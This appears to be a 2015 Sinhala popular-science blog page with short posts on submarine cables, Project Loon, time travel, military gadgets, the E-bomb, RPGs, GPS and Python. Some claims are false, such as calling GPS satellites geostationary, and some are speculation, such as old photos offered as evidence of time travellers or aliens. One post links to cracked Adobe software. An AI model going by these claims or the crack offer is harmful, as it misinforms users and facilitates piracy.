Wednesday, August 26, 2015

අන්තර්ජාල කේබල්


Picture
ඉන්ටෙර්නෙට් කනෙක්ෂන් එක ගොඩක් දෙනෙක් ගන්නේ වයර්ලස් ක්‍රමයට උනත් ඉන්ටෙර්නෙට් හැදිලා තියෙන්නේ කේබල් ජාලයකින් . මේ කේබල් ජාලය තියෙන්නේ මුහුදු පතුලේ . මේවත් නිකන්ම නිකන් කේබල් නෙමේ . මේ කේබල් වැඩි හරියක් ප්‍රකාශ තන්තු වලින් තමා හදල තියෙන්නේ . ඒවගේම මේ කේබල් වලින් ගමන් කරන්නේ ආලෝක කදම්බ .මේ කේබල් එක ගොඩබිම් මධ්‍යස්ථානයකින් පටන්ගෙන තවත් ගොඩබිම් මධ්‍යස්ථානයකින් කෙරවල වෙනවා . මේ විදියට තමා රට රටවල් සම්බන්ද කරමින් මුළු ලෝකයටම ඉන්ටෙර්නෙට් සම්බන්ධතාවය  ලබා දෙන්නේ.



Picture




මේ සන්නිවේදන මධ්‍යස්ථානවල මේ කටයුතු කරන්න අවශ්‍ය කරන සෑම දෙයක්ම තියනවා . විදුලිය , කේබල් වලින් තොරතුරු යවන්න ඕනකරන උපකරණ මේ උපකරණ ක්‍රියාත්මක කරන්න අවශ්‍ය කරන අය තව සමහර මධ්‍යස්ථානවල සැටලයිට් සම්බන්ධතා තියෙනවා.ලංකාවට මන් දන්නා තරමින් මේ  ගොඩබිම් මධ්‍යස්ථාන 5ක් තියෙනව . මන් හරියටම කියන්න දන්නෑ කියක් තියෙනවඩ කියලා.

කේබල් හදල තියෙන්නේ කොහොමද ?

ඉන්ටෙර්නෙට් ලබා දෙන හැම කේබල් එකක්ම හැදිලා තියෙන්නේ ප්‍රකාශ තන්තුවලින් නෙමෙයි. හුගක් ඒවා තඹ වලින් තම හදල තියෙන්නේ . එත් මුහුද යටින් යන ගොඩක් කේබල් හදල තියෙන්නේ ප්‍රකාශ තන්තු වලින් .

සාමාන්‍යයෙන් මේ කේබල් විෂ්කබයෙන් මිලිමීටර් 69ක් වෙනවා. මේ කේබල් මීටර් 1ක් කිලෝග්‍රෑම් 10ක් බරයි මේ කේබල් වලට වටින් ඝනකම් ආවරණ කිහිපයක් තියෙනවා. පිටතින්ම තියෙන්නේ තරවල ගිල්වූ නයිලෝන් ආවරණයක් හෝ පොලිතින් අවරණයකි . ඊට  පස්සේ  මයිලර් ටේප් , ගැල්වනයිස් කල වානේ කම්බි ,  වතුර කාන්දු නොවන විදියට හදපු ඇලුමිනියම් ආවරණයක් පොලිකාබනෙට් ආවරණයක් තඹ හෝ ඇලුමිනියම් නලයක් හා පෙට්‍රෝලියම් ජෙලි මාද්‍යයක් තියෙනවා . මේ හැම දෙකටම මැදින් තමා ප්‍රකාශ තන්තු තියෙන්නේ.
 
 

අපේ රටට ඉන්ටෙර්නෙට් ගේන කේබල්

1. සීමීවී 3 (SEA-ME-WE3- south east Asia middle east western Europe 3 cable system)

1999දී තමයි මේක පටන් අරගෙන තියෙන්නේ  . කිලෝමීටර් 39000ක් දිගයි. ජර්මනියේ නොර්ඩන් නුවර ඉදන්  සුවස් ඇළ හරහා මැද පෙරදිග ඉදන් ඇවිල්ල දකුණු ආසියානු රටවල් වල ඉඳල අග්නිදිග ආසියාවටත් එතනින් දකුණු කොරියාවටත් , ඔස්ට්‍රේලියාවට විහිදෙන මේ කේබල් පද්දතියෙන් රටවල් 33ක් ගොඩබිම් මධ්‍යස්ථාන 39ක් සමග සම්බන්ද වෙනවා .  ගල්කිස්සේ තමයි අපේ රටේ ගොඩබිම් මධ්‍යස්ථානය තියෙන්නේ.

 2. සීමීවී 4 (SEA-ME-WE3- south east Asia middle east western Europe 4 cable system)

ප්‍රංශයෙන් පටන්ගෙන සුවස් අල හරහා සින්ගප්පුරුවෙන් ඉවරවෙන මේ කේබල් ජලය කිල්මිටර් 20 000 ක් දිගයි. රටවල් 16ක් ගොඩබිම් මධ්‍යස්ථාන 17කින් සම්භන්ද වෙනවා. 2005 දෙසැම්බර් 13 අරඹ කරපු මේ කේබල් ජාලය ගොඩනගන්න වියදම් දරල තියෙන්නේ සන්නිවේදන සමාගම් 16ක් එකතුවෙලා ටෙලිකොම් එකත් එකට අදාලයි.

3. භාරත් ලංකා කේබල් සිස්ටම්

ඉන්දියාවේ ටුටෝකොරින් සිට කොළඹට එන මේ එන  මේ කේබල් ජලය කිලෝමීටර් 325ක් දිගයි. 2006 ජුනි මාසයේ ඉඳන් අපිට සේවා සපයනවා.
අපේ ටෙලිකොම් සමාගමයි, ඉන්දියාවේ සංචාර් නිගම් (BSNL ) සමාගම එකතුවී නිර්මාණය කරන ලදී.

4. දිරගු එස්එල්ටී කේබල් නෙට්වර්ක්

කොළඹ සිට මාලේ නුවරට එලාතියෙන මේ කේබල් පද්දතිය කිලෝමීටර් 850ක් දිගයි. 2007 සිට මේක අපිට ඉන්ටෙර්නෙට් කනෙක්ෂන් එක ලබා දෙනවා.

5. වාර්ෆ් සබ්මැරින් කේබල්

දිග කිලෝමීටර් 680යි. මාලේ නුවර ඉඳන් ඉන්දියාවේ ත්රිවන්ද්‍රම් දක්වා යන මේ කේබල් පද්දතිය කොලබට තමා සම්බන්ධ වෙන්නේ. 2007 මාර්තු වල ඉඳන් ක්‍රියාත්මකයි.

ලෝකේ පුර තියෙන හැම කේබල් එකක් ගැනම තොරතුරු submarinecablemap.com සයිට් එකේ තියෙනවා

 මන් දන්නේ ඔය විස්තර ටික තමා වැරදි තියෙනවානම් කියන්න දන්නා දේවල් තියෙනවනම් ඒවත් ඒවත් කියන්න .

ලෝකෙටම ඉන්ටෙර්නෙට් සපයන google loons

අපි අන්තර් ජාලයට විවිද ක්‍රම මගින් සම්බන්ද වෙනවා. එත් තවමත් ලෝක ජනගහනයෙන් තුනෙන් දෙකකට අන්තර්ජාල සම්බන්දතාවය නැහැ. ඒ අතින් අපි වාසනාවන්තයි. වැඩිපුර ගානක් ගත්තත් අපිට ඉන්ටෙර්නෙට් යන්න පුළුවන්.

මේ ගැන හිතලා google එකෙන් ව්‍යාපෘතියක් ආරම්භ කර තිබෙනවා. මේකේ මුලික පරමාර්ථය තමා ග්‍රාමීය දුෂ්කර ප්‍රදේශ වල ඉන්න ජනතාවට අන්තර්ජාල සම්බන්ධතාවය ලබා දීම හෑ ආපදා තත්ත්ව වලදී ඉක්මනින් සහන සැලසීමට හැකියාව ලබාදීම. මේ සඳහා google ආයතනය භාවිතා කරන්නේ බැලුන් (balloons) වේ.




පරිවර්ති ගෝලය තුල එනම් පෘතුවි පෘෂ්ටයේ සිට කිලෝමීටර් 20 ක් ඉහලින් මේම බැලුන ස්ථාන ගත කර තිබෙනවා. එහි තිබෙන විවිද ස්තරවල විවිද වෙගමට්ටම් වලින් සුලන් ප්‍රවාහයන් හමාගෙන යනවා. project loon වල බැලුන ගමන් කරවීමට අවශ්‍ය වූ විට එහි ඇති විවිද වූ ගණිතකර්ම හෑ මෘදුකාංග යොදාගෙන බැලුන නිවැරදි මාර්ගයට ගන්නවා.

කිලෝමීටර් 10-60 ත් අතර වන පරිවර්ති ගෝලය තුල විවිද වූ කාලගුණික තත්ත්ව පවතිනවා. මුහුදු මට්ටමේ සිට බලන විට මෙහි වායු පීඩනය 1% පමණ වෙනවා. විටක ඉතාමත් උෂ්ණ පරිසරයක් ඇතිවන අතර තවත් විටක සෙල්සියස් අංශක -80 (සෘණ 80) දක්වා පහල යනවා. එමෙන් ම සූර්යයාගෙන් පිටවන අහිතකර කිරණ (අදොරක්ත තරංග වැනි )UV කිරණ වැනි දෙවලින්ද මේ ස්තරය සපිරියි. ඒ නිසා මේම බැලුන වලට විශේෂිත ආරක්ෂක උපක්‍රම භාවිතා කර තිබෙනවා.

බැලුමේ වාතය පිරවීමට හැකි කොටස විශේෂිත ආකාරයෙන් සකසා තිබෙනවා. දින 100ක කාලයක් දරුණු පාරිසරික තත්ත්ව වලට මුහුණ දීමට හැකිවන අයුරින්. මෙහි වාතය පිරවීමට හැකි කොටස ප්ලාස්ටික් හා  පොලිතින් මිශ්‍ර සංයෝගයගින් නිමවා තිබෙනවා. මෙය සම්පුර්ණයෙන් පුම්බා ඇතිවිට මීටර 12ත් 15 ත් අතර උසක් ගන්නවා.  මෙය සේවා අවශ්ශතා  සඳහා පහලට ගැනීමේදී බැලුම තුල අතිවාතය පිටතට නිකුත් කර පහලට ගන්නවා. මෙවිට වේගයෙන් පොලවට ලන්ගාවෙන බලුනයේ වේගය පාලනය කිරීමට පැරෂුටයක් භාවිතා කරනවා.
මේවට බලය ලැබෙන්නේ සුර්ය කෝෂ වලිනි රාත්‍රී කාලයේදී බලය ලබා ගැනීමට මේ සුර්යකෝෂ වලින් ලබාගන්න බලය බැටරි වල ගබඩා කරගෙන භාවිත කරනවා. මෙහි වොට් 100ක පමණ බලයක් ලබාදියහැකි සුර්ය පැනල සවිකර තිබෙනවා.

මේම එක් බලුනයකට  LTE තාක්ෂනය යොදාගනිමින් 40 km පමණ දුරකට සම්භාන්දතාව ලබා දීමට පුළුවන්.
එමනිසා මහජනයාට තමන්ගේ lte උපකරණ වලින් මේම අන්තර්ජාල පහසුකම ලබාගැනීමට පුළුවන්. එසේම මේ ක්‍රමයෙන් ජනතාවට උපරිම වේගයෙන් අන්තර්ජාලය භාවිතා කිරීමට හැකියාව ලැබෙනවා.lte භාවිතයේදී සන්නිවේදන සමාගම් වල සහයෝගයෙන් අන්තර්ජාලය ලබාදීමට කටයුතු කරනවා.


නැනෝ රෝබෝට්ස්

නැනෝ තාක්ෂණයට මේ වන විට වසර 50ක් පමණ වේ. මෙමෙ තාක්ෂනය තවමත් පර්යේෂණ මට්ටමේ ඇති අතර මෙමගින් ඉතාමත් පුදුමාකාර දේ නිපද විය හැක මේ වීඩියෝ බලන්න


මේ තියෙන්නේ වසරේ හොදම රොබෝ නිපැයුම්.මොකද හිතන්නේ කොමෙන්ටුවක් දාගෙන යන්න

කාල තරණය


සාපේක්ෂතා වාදය ඉදිරිපත් කරමින් කාලය හා අවකාශය එකට බැඳී ඇති බව ප්‍රකාශ කළා. තවද අවකාශයේ විවිද මානයන් 4ක් ඇති බවත් සඳහන් කරනවා. ඒවා තමයි දිග පළල උස හා හතරවෙනි මානය ලෙස කාලය. අපිට දිග පළල හා උස කියන මාන හරහා ගමන් කරන්න පුළුවන් එත් තවමත් අපිට බෑ කාලය හරහා ගමන් කරන්න.

එත් අපි හැම විටම අපි කාලය හරහා ගමන් කරනවා. සාම විනාදියකම අපි විනාඩියක වේගයකින් ගමන් කරනවා. එහෙත් කාලය හරහා ගමන් කරනවා කියන්නේ මේකට නෙමේ. අපි දැනට කාලය ගමන් කරන වේගයට වඩා ඉතාමත්  වැඩි වේගයකින් ඒ කිව්වේ  ආලෝකයේ වේගයෙන් හෝ  ඊටත් වඩා වැඩි වේගයෙන් ( ආලෝකයේ වේගය : ආලෝකය තත්පරේට 300000 km වේගයෙන් ගමන් කරයි.) ගමන් කරන්න පුලුවන්නම් අපිට කාලය හරහා ගමන් කරන්න පුළුවන්. මේවා සියල්ලම දැනට සිද්ධාන්ත විතරයි.

තව දෙයක් තියෙනව අප කාලය හරහා ගමන් කරන කොට කාල මාන දෙක අතර ඉන්න අයට ඒ කාල තරණය ගැන කිසිම දෙයක් දැනෙන්නේ නෑ වෙන්නේ අපි කාලය හරහා යාමක්

ඔයාගේ වයස අවරුදු 17යි කියලා හිතමු. ඔයා ආලෝකයේ වේගයෙන්  ගමන් කරන යානයක නැගලා පෘතුවියේ කාලයෙන් අව්රුද්දක්  ගමන් කරනවා කියලා. ඒ කිව්වේ මාස 6ක් ක් පෘතුවියෙන් ඈතට ගිහින් ඉතුරු මාස 6 දි නැවතත් පෘතුවියට එනවා කියලා. එහෙම ගිහින් එනකොට ඔයාගේ වයස අවරුදු 18යි එත්  ඔයා එන්නේ ඔයා හිටපු කාලයට නෙමේ අනාගතයට එහෙම වෙන්නේ ඔයාලා වීනාදී පහක් ගතකලාට ඔයා පිටවුණ කාල මානයෙ කාලය ඒ ආකාරයෙන් ගමන් කරන නිසා. පෘතුවියෙන් ඈතට යද්දී කාල රාමු අතර වෙනසක් වෙනවා. ඒ කියන්නේ පෘතුවියේ  කාලය විශ්වයට අදාළ නැති නිසා ඔයා ඉතාමත් වේගයෙන් ඈතට යද්දී සිදුවන කාල අවකාශ තරණය නිසා තමා මෙහෙම වෙන්නේ.

දැන් ටිකක් හිතන්න. මොලේ අවුල් ගහගන්න එපා ටිකක් හිමිට හිතන්න. එතකොට මේක තේරුම් ගන්න පුළුවන්.

කාල තරණය කල අයද මේ ???

මේ චයාරුප බලන්න

පලවෙනි රුපයෙන් දැක්වෙන්නේ  බ්‍රසීල ක්‍රීඩකය තමන්ගේ කුසලානය අතැතිව සිටින අවස්තාවක්. මේකේ රවුම් කරලා තියෙන කොටස බලන්නේ මේ තියෙන්නේ ටච් ෆෝන් එකක් නේද ??? 1962 වැනි කාලයකදී ටච් ෆෝන් තිබුනාද?? වර්ෂ 2000දි තමා ලෝකයේ ප්‍රථම ටච් ස්ක්‍රීන් දුරකථනය බිහිවුනේ. එහෙනම් මේ තියෙන්නේ මොකක්ද??


මේ රුපයේ දැක්වෙන්නේ 1938දි ගත්ත චායාරුපයක්. බලන්න මේ කාන්තාව අතේ තියාගෙන ඉන්නේ මොකක්ද කයලා ??? දුරකතනයක් නේද

බලන්න මේ තියෙන ෆොටෝ වල තිට්යෙන කැමරා වර්ග ගැන. මේවා මේ කාලයේ තියෙන්න පුලුවන්ද ?







මටනම් හිතෙන්නේ කාල තරණය කරපු අය  කියලා තව හිතෙනවා මේ සේරම මේ පින්තුරවල පෙන්නන කාලෙත් මෙයාලා ගාව තියෙන මේ කැමරා ෆෝන් එහෙම නිපදවලා තියෙන්න ඇති ඒවා සාමාන්‍ය ජනතාවට දෙන්නේ නැතුව රජයේ හරි මොකක්හරි සන්විදානයක ය හරි පාවිච්චි කරන්න ඇති පස්සේ මේවා සාමාන්‍ය ජනතාවට දෙන්න ඇති එහෙමත් නැත්තන් ටොර් බ්‍රව්සර් එක වගේ හමුදාව පාවිච්චි කරලා පස්සේ සාමාන්‍ය ජනතාවට ඉදිරිපත් කළා වෙන්න පුළුවන්.

එහෙමත් නැත්තන් මේ පිටසක්වල ජීවින්. එයාලා තමා මේ අපි පාවිච්චි කරන හැම තාක්ෂනයක්ම ඔඉත දුන්නේ එහෙමත් හිතෙනවා මට.

අනාගතයේදී එන සෙබළුන්ගේ අධි තාක්ෂණික උපකරණ ..

...සෙබළුන්ගේ අධි තාක්ෂණික උපකරණ... 


අද දියුණු රටවල සෙබළුන් තමන්ගේ මෙහෙයුම් වලද විවිද අධි තාක්ෂණික උපකරණ භාවිත කරයි. මේවා සමහරක් අපි සෙල්ලම් කරන ගේම් වල තියෙන ඒවා වගේ. අපි සෙල්ලම් කරන modern warfare වැනි ගේම් වල තියෙන ඒවා දැන් ඇත්තටම පාවිච්චි කරනවා. land warrior මේකෙන් පුළුවන් තමන්ගේ කණ්ඩායමත් එක්ක වීඩියෝ සමග සම්බන්ද වෙන්න මේ නිසා අනිත් අයට පෙන සතුරු ඉලක්කත් කණ්ඩායමේ සෙසු සාමාජිකයන්ට බලාගන්න පුළුවන්. රේඩියෝ ට්‍රාන්ස්මීටර් එකක් වීඩියෝ ට්‍රාන්ස්මීටර් එකක් හෑ gps උපකරණයක් මේකේ තියෙනවා. ඔක්කොගෙම බර කිලෝ 7.5 පස්සේ මේක බර වැඩි හින්දා අයින් කරා. න මුත් බර අඩු කරලා ඒ කිව්වේ කිලෝ 4.1 ක උපකරණයක් දැන් පාවිච්චි කරනවා.

Wrist – mounted display මේ විදිහට උපකරණ වැඩි වෙන කොට බර වැඩි වෙනවනේ. ඒ හින්දා මේ හින්දා hp සමාගම කුඩා නම්‍යශීලි බහුකාර්ය පරිගණකයක් නිපද වීමට කටයුතු කරනවා. වැලමිටයි මැණික් කටුවයි අතර ප්‍රද්ශයේ තමා මේක පලදින්නේ. ග්රෑම් 223 ක් බර වෙන මේක නම්‍යශීලි තිරයක් තමා තියෙන්නේ නම්‍යශීලි ප්ලාස්ටික් වලින් නිමවා තියෙනවා. වතුර යන්නේ නෑ හැප්පීම් දුවිලි වලට ඔරොත්තු දෙනවා. අඩුබල තිරයක් නිසා බැටරිය දිගු කාලයක් පවතිනවා. මෙය නිපදවූ පසු සිතියම් මූලස්ථානයෙන් ලැබෙන පණිවිඩ, වීඩියෝ දත්ත රේඩියෝ පණිවිඩ අවි ඉලක්ක කිරීම් දත්ත හා තවත් ප්‍රයෝජන අතිවිශාල ප්‍රමාණයක් සෙබලෙකුගේ අතටම ලැබෙනු ඇත. එසේම මෙය හරහා ජංගම දුරකථනයක, Tab එකක හා රූපවාහිනියක කාර්යද ඉටුකර ගැනීමට සෙබලුන්ට හැකිවනු ඇත.


මේම උපකරණ විදුලියෙන් ක්‍රියා කරන නිසා සෙස්බලාට නිතරම ආරෝපිත් බැටරි ලඟතබා ගැනීමට සිදුවේ බැටරි නැවත ආරෝපණය කිරීමට මුලස්තනයටම පැමිණීමට සිදුවේ. මේ නිසා මෙයට විසඳුමක් විදියට ජර්මානු සමාගමක් M- 25 Fuel Cell නමින් අලුතෙන් බැටරියක් නිපදවලා තියෙනවා. මේකට පය 72 ක් එක දිගට වොට් 25ක බලයක් දෙන්න පුළුවන් තව අවශ්‍ය ඕනෑම මොහොතක ක්ෂණයකින් වොට් 200ක බලයක් දෙන්නත් පුළුවන්.බර කිලෝ 2 අඩුයි.



තව පුදුම හිතෙන දෙයක් තමා මේ හැම සෙබළෙක්ම iphone ipad android ස්මාර්ට් ෆෝන් පාවිච්චි කරනවා. මෙහෙයුම් වලදී මේ සාම ෆෝන් එකක්ම මහජනයා භාවිත කරනවා ඇත්තටම මවා කුඩා පරිගණක වගේනේ ඉතින් ඒ නිසා මේවාට විවිද වූ ඇප්ස් වර්ග දාගෙන විවිද වැඩ කරගන්නවා. භාෂා පරිවර්තනය. කාලගුණ විස්තර වගේ ඒවා.තව ස්නයිපර් තුවක්කු කරුවන් වාතයේ ආද්‍රතාව සුළගේ වේගය වගේ දේවල් මේ හරහා සොයා ගන්නවා.gps මගින් ස්ථාන සොයාගන්නවා..

 

මේ ඇත්තම කාල තරනයක්ද ????

ෆ්ලෑෂ්ටත් වඩා වේගවත්ද ?? නැත්නම් කාලය හරහා ගමන් කිරීමක්ද ??? 

 




ඊ බෝම්බ E BOMB

                                 ...ඊ බෝම්බ E BOMB ...

ඊ බෝම්බ මේවා පිපිරීමෙන් ලොකු විනාශයක් ඇතිවෙනවා. සමහර වෙලාවට ඩොලර් මිලියන ගණනක නත්නම් බිලියන ගණනක වගේ පාඩුවක් වෙන්න පුළුවන්. එත් මේවගෙන් නම් මිනිස්සු මැරෙන්නේ නෑ වෙන්නේ විදුලි උපකරණ මැරෙන එක.



e bomb මේ නම දිග ඇරියාම එන්නේ electromagnetic bomb කියන එක. එනම් මේම බෝම්බය විද්‍යුත් චුම්බහ තරංග පිටකරන බෝම්බයක්. මේවා යුද්ද කටයුතු වලට භාවිතා කිරීමට නිර්මාණය කල ඒවා වේ. මේවගෙන් සතුරන්ගේ ඇති සියලුම විද්‍යුත් තාක්ෂණික අවි උපකරණ ක්‍රියා විරහිත කිරීමට හැකියි.

මේවා පුපුරා ගියාම කිසිදු ශබ්දයක් නිකුත් නොවන අතර පිටවන්නේ ඇසට නොපෙනෙන චුම්බක තරංගයි. ඊ - බෝම්බයකින් නිකුත් කෙරෙන විද්‍යුත් චුම්බක ස්පන්දක මගින් හානි කළ හැකි හෝ අකි‍්‍රය වියහැකිඋපකරණ වන්නේ අන්තර් පරිපථ, මධ්‍යම සැකසුම් ඒකක, සිලිකන් චිප, ට්‍රාන්සිස්ටර, රික්තක නාළ හෙවත් ත’මයන කපාට, පේ‍්‍රරක, මෝටර ආදියයි. කෙසේ වෙතත් මේ මගින් හානි සිදුවන්නේ විද්යුත් චුම්බකත්වයට සංවේදී උපකරණවලට පමණයි.

පැරණි රික්තක නාළ ඇතුළත් පද්ධතිවලට මෙයින් හානියක් සිදු වන්නේ නැහැ.එසේ ම විද්‍යුත් චුම්බක ස්පන්දකවලට සංවේදී මෙවලම් බිඳ නොවැටී බේරා ගැනීමට නම් ඒවා වටා ‘ෆැරඬේ ආරක්ෂක කූඩුවක්’ යෙදිය යුතු යැයිජනා කර තියෙනවා. මේ ආරක්ෂක කූඩුව තැනෙන්නේ ඇලූමීනියම් ලෝහ තහඩුවලින්. ඒත් ඒ ක්‍රමයෙන් පරිගණක පද්ධති රැක ගත හැකි වේයැයි සිතන්න බැහැ. ඒ පරිගණකවලට බලය සපයන රැහැන් හෝ ඇන්ටෙනා මගින් මේ බෝම්බයෙන් නිකුත් කෙරෙන විද්‍යුත් චුම්බක ස්පන්දකවලට ඇතුළු විය හැකි වන නිසයි. මේවා අයත් වන්නේ තුන්වන නෂ්ටික බෝම්බවලටයි.




RPG

RPG මේ ආයුදේ ගැන මන් අමුතුවෙන් කියන්න ඕනේ නෑනේ. ගේම් ගහන නොගහන ඕනේ කෙනෙක් මේ ගැන දන්නවනේ. අද කියන්නේ RPG ගැන.
 RPG මේක දිග නම තමා :- Rocket Propelled Grenade. මේකේ තේරුම සිංහලේට දැම්මම එන්නේ රොකට් බෝම්බ විදිනය කියන එක වගේ. කොහොමත් මේකෙන් කරන්නේ විනාශ කරන එකනේ.
 


මේක යුද්ද ටැංකි විනාශක බෝම්බයක් කොටස් දෙකින් සමන්විතයි. බෝම්බය හෑ බෝම්බ විදිනය තමා කොටස් දෙක. 


 
දෙවන ලෝක යුද සමයේදී රටවල් අතර ඇතිවුන සටන් වලදී වැඩි වශයෙන් භාවිත වුනේ යුද්ද ටැංකි. මේවා ප්‍රභලයි කියන එක අමුතුවෙන් කියන්න ඉනේ නෑනේ. මේවා විනාශ කරන ආයුද නිෂ්පාදනයේදී තම RPG බිහිවුනේ. මේක තැන තැන ගෙනයන්න පුළුවන්. ඒ වගේම පහර දෙන එකත් ලේසියි. මේම බෝම්බයක් පුපුරා යද්දී අදික ලෙස තාපය පිට වෙනවා. ඉතාමත් දරුණු අන්දමේ පිපිරීමක් මේකට ඇති කරන්න පුළුවන්. මේ යුදෙ ගරිල්ලා සටන් කාමීන් කැමතිම ආයුදයක්. ලොවපුරා රටවල් 12 ක මේවා නිෂ්පාදනය කරනවා. තව ලෝකය පුරා රටවල් 40 ක පමණ මේම ආයුධය ඉතාම ජනප්‍රියයි.



RPG එකක් විදිනක්ට ඒ අවට විශාල ශබ්දයක් ඇතිවෙනවා. ඒ වගේම මේවා විදිනකොට විශාල පීඩනයක් ප්‍රතිවිරුද්ද දිශාවට යොමු වෙනවා. මේ නිසා මේ අවිය භාවිතා කිරීම තරමක් අසීරුයි. අවිය භාවිතා කිරීම පුරුදු වෙන්නටද ටික කාලයක් ගත වෙනවා. කෙසේ වෙතාත් මේ අවියට සටන්කාමීන්ගේ නොමද ආදරය හිමිවෙනවා.

GPS`වැඩ කරන විදිය.



                                 ..GPS`වැඩ කරන විදිය...

GPS ඉස්සෙල්ලාම පාවිච්චි කරේ ඇමරිකානු හමුදාව තමන්ගේ ආරක්ෂක කටයුතු වලට. පස්සේ මේක මුළු ලෝකෙටම විවුර්ත කළා. අවම වශයෙන් GPS සැටලයිට් 24 ක් අපේ පෘතුවියට ඉහලින් කක්ෂගත කරලා තියෙනවා. මේවා තියෙන්නේ පෘතුවියේ ඉඳන් කිලෝමීටර් 20200 ක් දුරින්. මේවා භූ ස්ථාවර චන්ද්‍රිකා. ඒ කියන්නේ මේවා තියෙන තැන වෙනස් වෙන්නේ නෑ. හැමදාම දකින්නේ එකම තැන. මේ සැටලයිට් ස්ථාන ගත කරලා තියෙන්නේ ලෝකේ කොහේ හිටියත් මේ සැටලයිට් 4ක් දැකගන්න පුළුවන් වෙන්න. එත් මේවා පියවි ඇසින් දැකගන්න බෑ. එත් මේවගේ තරංග වලින් අපිට වැඩ ගන්න පුළුවන්. මේවා එක එල්ලේ ගමන් කරන තරංග විශේෂයක් ඒ නිසා ගෙවල් ඇතුලේ ඉන්නකොට එහෙම වැඩ කරන්නේ නෑ. මොකද සිග්නල් වලට බාධා එන නිසා.


GPS කව්ද දැන් නොදන්නේ හැමෝම GPS ගැන දන්නවා. එත් මේක වැඩකරන්නේ කොහොමද කයන එක දැනගෙන හිටියද??



GPS ඉස්සෙල්ලාම පාවිච්චි කරේ ඇමරිකානු හමුදාව තමන්ගේ ආරක්ෂක කටයුතු වලට. පස්සේ මේක මුළු ලෝකෙටම විවුර්ත කළා. අවම වශයෙන් GPS සැටලයිට් 24 ක් අපේ පෘතුවියට ඉහලින් කක්ෂගත කරලා තියෙනවා. මේවා තියෙන්නේ පෘතුවියේ ඉඳන් කිලෝමීටර් 20200 ක් දුරින්. මේවා භූ ස්ථාවර චන්ද්‍රිකා. ඒ කියන්නේ මේවා තියෙන තැන වෙනස් වෙන්නේ නෑ. හැමදාම දකින්නේ එකම තැන. මේ සැටලයිට් ස්ථාන ගත කරලා තියෙන්නේ ලෝකේ කොහේ හිටියත් මේ සැටලයිට් 4ක් දැකගන්න පුළුවන් වෙන්න. එත් මේවා පියවි ඇසින් දැකගන්න බෑ. එත් මේවගේ තරංග වලින් අපිට වැඩ ගන්න පුළුවන්. මේවා එක එල්ලේ ගමන් කරන තරංග විශේෂයක් ඒ නිසා ගෙවල් ඇතුලේ ඉන්නකොට එහෙම වැඩ කරන්නේ නෑ. මොකද සිග්නල් වලට බාධා එන නිසා.



සෑම GPS සැටලයිට් එකටම ඉතාමත් නිවැරදි විදිහට කාලය සටහන් වෙන ඔරලෝසුවක් තියෙනවා. මට මතක විදිහටනම් ඒවා පරමාණුක ඔරලෝසු. ඒවායෙන් එවන සිග්නල් වල තමන් දැනට සිටින තැනයි වෙලාවයි සටහන් වෙනවා.අපි ඉන්න ස්ථානය සොයාගන්නේ GPS සැටලයිට් වලට සම්බන්ධ වීමෙන් නෙවේ ඒ සැටලයිට් වලින් එන සිග්නල් වලට සවන් දීමෙන්. ඒ කියන්නේ ඒ සැටලයිට් වලින් එන සිග්නල් අපි අල්ලාගෙන අපි ඉන්න තැනගැන සොයා ගන්න එක. මෙහිදී සැටලයිට් 4 කට සවන් දීමක් සිදුවෙනවා.

ඈත තියෙන චන්ද්‍රිකාවෙන් සිග්නල් එන්නේ පරක්කු වෙලා ළඟ තියෙන චන්ද්‍රිකාවෙන් සිග්නල් එන්නේ ඉක්මනට. මේ සිග්නල් වල ඒ චන්ද්‍රිකාව දැනට සිටින තනි වෙලාවයි සටහන් වෙලා තියෙනවා. ඒ විදිහට ගණනය කිරීම් කරලා තමා අපි ඉන්න තැන හරිටම සොයාගන්නේ. රුසියාවෙන් GLONASS චීනෙන් බයිදු කියලත් මේ GPS වගේම වැඩකරන සිස්ටම් තියෙනවා.

කියන්න අමතක වුනා. GPS කියන එක දිග අරපුවාම එන්නේ. Global Positioning System  කියන එක. වීඩියෝ කතා එකෙන් උස්සපු පහල තියෙන වීඩියෝ එකත් බලන්නකෝ.


Python සිංහලෙන්



පයිතන් කියන්නේ පරිගණක ක්‍රමලේඛන භාෂාවක්. ජාවා වලට පස්සේ ආව හොඳම භාෂාව කියලා තම කියන්නේ. al වලට පයිතන් ගැන පාඩමකුත් තිබෙනවා.අද ඩවුන්ලොඩ් කරලා තියාගන්න.ඉස්සරහට සොෆ්ට්වෙයා කැල්ලක් හදනකන්ම පාඩමෙන් පාඩම කියල දෙන්නම්.< <<ලින්ක් එකට ගිහින් තප්පර පහක් ඉදලා ක්ලික් කරන්න>>>
 මෙතනින් ගිහින් පයිතන් පොත ඩවුන්ලෝඩ් කරගන්න. පයිතන් නැති අය මෙතනින්  ගිහින් අරගන්න.

adobe audition cs6 with crack


ඔන්න යාලුවනේ අද ගෙනාවා පට්ට සොෆ්ට්වෙයා කෑල්ලක්.ඔය සින්දු වලට ඒක ඒක වැඩ දාන්නයි එක එක වෙනස් වැඩ කැලී දාන්නයි මේක සුප්ප භාන්ඩේ.පහල ලින්ක් එක්න් බාගෙනම බලන්නකො.ලින්ක් එකට ගිහින් තප්පර පහක් ඉදලා Skip Add ක්ලික් කරන්න    http://sh.st/vRgHA


Tuesday, August 25, 2015

මොකද්ද මේ අන්ශු ත්වරකය..

                                

                                  අංශු ත්වරක යන්ත්‍රයක් යනු ??


අංශු ත්වරක වලට කියන ඉංගිරිසි නම තමා Particle accelerator

අංශු ත්වරක යන්ත්‍රයක් යනු , ආරෝපිත අංශු විද්‍යුත් චුම්භක ක්ෂේත්‍ර මගින් අධික වෙගවලට ත්වරණය කොට තනි අධි ශක්ති කදම්භයක් ලෙස පවත්වාගන්න උපකරණයක්. කෙටියෙන්ම කිව්වොත් මුලිකාන්ශු අංශු වලට ත්වරණයක් ලබාදෙන යන්ත්‍රයක් තමා මේක.

මේ අංශු ත්වරක යන්ත්‍ර වල සරල යන්තර අපේ සමහර ගෙවල් වලත් තියෙනවා. දැන් නම් හැම ග්දරම වගේ සරල අංශු ත්වරක තියෙනවා. මේ ගෙවල් වල තියෙන ත්වරකය තමයි ටීවී ටියුබ් එක (tv tube). මේවගේ සිදුවන්නේ ඉලෙක්ට්‍රෝන විදිනයකින් විදිනු ලබන ඉලෙක්ට්‍රෝන විද්‍යුත් චුම්භක ක්ෂේත්‍ර මගින් ත්වරණය කොට තිරය වෙත යොමු කිරීමයි. මේ සරලම අංශු ත්වරකයක්. මිට වඩා අධික ප්‍රවේග වලට අංශු ත්වරණය කල හැකි ඉතා විශාල වූ අංශු තවරක විසිවන සියවසේ මුල් භාගයේදී පමණ ආරම්භ වුනා.

